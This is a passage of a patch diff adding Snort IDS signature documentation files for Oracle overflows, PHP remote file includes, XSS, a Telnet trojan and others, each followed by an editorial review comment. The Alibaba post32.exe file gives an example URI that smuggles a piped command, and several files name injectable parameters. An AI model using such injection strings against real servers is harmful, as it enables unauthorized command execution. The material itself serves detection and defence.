+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
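Review bot: the third Detailed Information paragraph and Attack Scenarios are weak-credential boilerplate that does not describe a remote file include through the admin_template_path parameter of app_setup.php; replace with an include-specific scenario. Fix "running ona web server", add the blank line before the "--" after the Affected Systems entry, and cite a reference in Additional References.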
--- /dev/null
+++ b/doc/signatures/2140.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2140
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the p-news bulletin board.
+
+--
+Impact:
+Possible escalation of privilege.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the p-news bulletin board. The p-news application has a flaw that allows normal users to escalate their privilege level to that of the administrator by using a malformed username.
+
+The attacker may be trying to gain administrator access.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can take control of the application by supplying a specially crafted malformed username.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
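Review bot: Affected Systems "Any host using php." is far too broad; the flaw is in the p-news application, so this should read "Hosts running p-news" with the affected versions. The Corrective Action "Check the php implementation on the host" is vague; the actionable advice is to upgrade p-news and review the board for unexpected administrator accounts. Additional References is empty, and "Sid: 2140" is followed by two blank lines.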
--- /dev/null
+++ b/doc/signatures/100000569.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000569
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_change_email.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_change_email.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
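Review bot: the third Detailed Information paragraph and Attack Scenarios are weak-credential boilerplate that does not describe a remote file include through the admin_template_path parameter of app_change_email.php; replace with an include-specific scenario. Fix "running ona web server", add the blank line before the "--" after the Affected Systems entry, and cite a reference in Additional References.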
--- /dev/null
+++ b/doc/signatures/2841.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2841
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
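Review bot: the procedure name in Detailed Information is split across a line break so that a line begins with a period ("vulnerability in the procedure create_snapshot_repgroup" followed by ". This procedure is included in"); join it to read "vulnerability in the procedure create_snapshot_repgroup. This procedure is included in sys.dbms_repcat_sna_utl." Under Affected Systems, "Oracle Oracle9i" repeats the vendor name; "Oracle 9i" is enough. Additional References is empty even though the text calls this a known vulnerability with "Multiple buffer overflow conditions"; add the vendor alert the rule was derived from, or drop the empty section rather than ship a heading with nothing under it.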
--- /dev/null
+++ b/doc/signatures/100000452.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000452
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "albumid" parameter in the "album.asp" script 
+used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
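Review bot: Impact overstates a cross site scripting flaw. "Possible unauthorized administrative access to the server or application" and "Possible execution of arbitrary code" describe server compromise, but Detailed Information and Attack Scenarios ("a malicious link designed to steal information from a user clicking on that link") describe a client-side attack; scope Impact to script execution in the victim's browser and theft of session data or credentials, and drop the "execute system binaries" sentence from Detailed Information unless there is a separate server-side finding. "Affected Systems: All systems running CGI applications using KAPhotoservice" should name the application and version; "album.asp" indicates an ASP application, not a generic CGI. Also the blank line before the "--" separator after "100000452" is missing, unlike the other sections of this file.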
--- /dev/null
+++ b/doc/signatures/100000440.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000440
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CyBoards" application running on a webserver. Access to the file "common.php" using a remote file being passed as the "script_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "script_path" parameter in the "common.php" script used by the "CyBoards" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CyBoards
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
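Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host...") and the Attack Scenarios paragraph are authentication-bypass boilerplate that does not match a remote file include via the "script_path" parameter. Replace both with the include scenario the first paragraph already describes: the attacker requests common.php with script_path pointing at a URL on a host they control and the server includes and executes that file. Also fix "ona" to "on a", change "an exploitation attempt has been attempted" in the Summary to "an exploitation attempt has been made", and either fill Additional References or remove the empty heading.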
--- /dev/null
+++ b/doc/signatures/2826.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2826
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
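Review bot: same defects as 2841.txt in this patch. The procedure name is split so that a line starts with a period ("vulnerability in the procedure validate_for_local_flavor" followed by ". This procedure is included in"); join it to "the procedure validate_for_local_flavor. This procedure is included in sys.dbms_repcat_fla." "Oracle Oracle9i" under Affected Systems doubles the vendor name, and Additional References is empty for what the text calls a known vulnerability; add the vendor alert or remove the empty section.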
--- /dev/null
+++ b/doc/signatures/2403.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
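Review bot: the final section is headed "References:" while every other signature file in this patch uses "Additional References:"; rename it so that anything splitting these files on section headings treats them uniformly. "Sucessful exploitation" in Detailed Information should be "Successful exploitation", and that fourth paragraph restates the second one (code execution with system privileges, or a DoS), so keep one of them. The phrase "an AccountName greater than 300 bytes" is the concrete detection criterion here and would be better placed in the Summary, which currently only says "a known vulnerability".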
--- /dev/null
+++ b/doc/signatures/214.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+214
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "lrk0x".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
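Review bot: Detailed Information is incomplete: "This Trojan affects Linux operating systems:" ends in a colon with nothing following it, and the file has no Affected Systems section although the other documents in this patch do. Either complete the list after the colon or end the sentence with a period and add an Affected Systems entry for Linux. The Summary only says the phrase "lrk0x" is sent to a Telnet server; say what the string identifies so an analyst can tell a backdoor login apart from an unrelated Telnet session. Corrective Action ("Delete the Trojan and kill any associated processes") should also say the host is to be treated as compromised, consistent with the Attack Scenarios text that the initial compromise came through another vulnerability.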
--- /dev/null
+++ b/doc/signatures/1202.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1202
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
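Review bot: nothing in this document is specific to rule 1202; Summary, Detailed Information and Attack Scenarios are the generic web-server text shared by several files in this patch, and Additional References is empty. State what the rule actually matches (the request path or content string) so the event can be triaged, and back "Simple. Exploits exist." with a reference or soften it.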
--- /dev/null
+++ b/doc/signatures/2070.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2070
+
+--
+Summary:
+made.
+
+--
+Impact:
+Code execution and possible control of the target machine
+
+--
+Detailed Information:
+Alibaba is a web server that runs on Windows platforms. An error in the 
+cgi script post32.exe allows piped commands to be processed on the 
+server.
+
+--
+Affected Systems:
+Computer Software Manufaktur Alibaba 2.0
+	Microsoft Windows 2000 Workstation
+	Microsoft Windows 95
+	Microsoft Windows 98
+	Microsoft Windows NT 4.0
+   
+--
+Attack Scenarios:
+The attacker merely needs to make an http request to the script using a 
+pipe command at the end of the URI to execute any command he chooses.
+
+For example, http://www.foo.com/cgi-bin/post32.exe|dir%20c:\
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Alibaba to the latest non vulnerable version if available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1485
+
+--
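Review bot: the Summary is truncated to the single word "made."; the sentence describing when the event is generated is missing. From Detailed Information and Attack Scenarios it should read along the lines of "This event is generated when an attempt to execute commands through the Alibaba web server CGI script post32.exe is made." Under Affected Systems the Windows entries are indented while "Computer Software Manufaktur Alibaba 2.0" is not; use one indentation style, as the other files do.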
--- /dev/null
+++ b/doc/signatures/644.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 644
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS345
+
+--
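Review bot: False Positives says "legitimate traffic to the specified port" but the document never names the port or service the rule watches (Attack Scenarios mentions an FTP server); state which port is matched so the false positive note is actionable. "Original Rule Writer Unkown" should be "Unknown", "Sid: 644" puts the number on the heading line unlike every other file here, and "tracks the bit combination" in Detailed Information should be "byte sequence", since the rule matches a shellcode string, as False Negatives says.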
--- /dev/null
+++ b/doc/signatures/100000572.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000572
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_page_caching.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_page_caching.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1204.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1204
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Fluid Dynamics Software Corporation
+http://www.xav.com/scripts/axs/help/1508.html
+
+--
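Review bot: Affected Systems is empty. The Additional References entry points at a Fluid Dynamics Software Corporation help page, so the affected application and version should be named there and in the Summary, which at present only says "a web server or an application running on that server". Also fix "ona web server" to "on a web server" in Detailed Information.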
--- /dev/null
+++ b/doc/signatures/100000135.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000135
+
+-- 
+Summary: 
+This event is generated when an attempt to exploit a format string attack 
+against the GNU Mailutils imap4d server.
+
+-- 
+
+Impact: 
+A denial of service will occur, and it may be possible to execute arbitrary 
+code with the privileges of the user running the imap server.
+
+--
+Detailed Information:
+The vulnerability is triggered when the request tag contains format string 
+characters. This will cause the server to read and/or write at invalid memory 
+locations, potentially allowing an attacker to execute arbitrary code.
+
+--
+Affected Systems:
+GNU Mailutils 0.5
+GNU Mailutils 0.6
+
+--
+
+Attack Scenarios: 
+Publicly available scripts exist to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, exploit scripts exist.
+
+-- 
+
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade to version 0.6.90 or higher.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
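Review bot: the Summary is a sentence fragment: "This event is generated when an attempt to exploit a format string attack against the GNU Mailutils imap4d server." Insert "is made" and say vulnerability rather than attack: "when an attempt is made to exploit a format string vulnerability in the GNU Mailutils imap4d server". Impact states "A denial of service will occur" as a certainty while Detailed Information says the server "potentially" allows code execution; use "may" in both places. Additional References is empty although Attack Scenarios says "Publicly available scripts exist to exploit this vulnerability"; cite the advisory that supports that and the 0.6.90 fix version given under Corrective Action.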
--- /dev/null
+++ b/doc/signatures/1964.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) ToolTalk.
+
+--
+Impact:
+Remote root access. This attack may permit the execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications to communicate in the Common
+Desktop Environment (CDE).  The ToolTalk service receives ToolTalk
+messages created and sent by applications and delivers them to the
+appropriate recipient applications.  The ToolTalk database server is
+enabled by default on hosts with CDE.  A function in the code receives
+an argument for a pathname.  If an overly long pathname is passed to the
+function, a buffer overflow may occur, possibly allowing the execution
+of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+	HP HP-UX 10.10, 10.20, 10.30, 11.0
+	IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+	SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+	Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3,
+	2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs.  Alternately, an attacker may attempt to execute the
+exploit code on any listening port in the RPC range if the portmapper is
+blocked.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
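Review bot: Corrective Action lists only filtering and disabling RPC services; add "Apply the appropriate vendor supplied patches", which the other documents in this patch recommend and which is the actual fix for the pathname overflow described in Detailed Information. Additional References is empty despite the detailed Affected Systems list, which must have come from an advisory; cite it. The Summary's "a buffer overflow associated with the Remote Procedure Call (RPC) ToolTalk" would be clearer as "in the ToolTalk database server (ttdbserverd) RPC service", matching Detailed Information.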
--- /dev/null
+++ b/doc/signatures/100000113.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000113
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to execute arbitrary commands 
+on a system running the HappyMall E-Commerce suite.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary commands of their choosing with the permissions of 
+the affected script.
+
+--
+Detailed Information:
+By specifying a value for the "file" parameter of the "member_html.cgi" script 
+that is enclosed by any combination of pipe or semicolon characters, attackers 
+may execute arbitrary commands on the host system with the privileges of the 
+affected script.
+
+--
+Affected Systems:
+HappyCGI HappyMall 4.3
+HappyCGI HappyMall 4.4
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser or publicly available exploits may be used.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unconfirmed patch is available at the URI listed in the Additional 
+References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353
+
+--
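Review bot: Corrective Action says "An unconfirmed patch is available at the URI listed in the Additional References section" but the only reference is a vendor forum thread; say so explicitly and advise verifying the fix with the vendor or upgrading past versions 4.3 and 4.4. The vendor is given as "HappyCGI" under Affected Systems but the Summary says "the HappyMall E-Commerce suite"; use one product name in both places.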
--- /dev/null
+++ b/doc/signatures/808.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+808
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
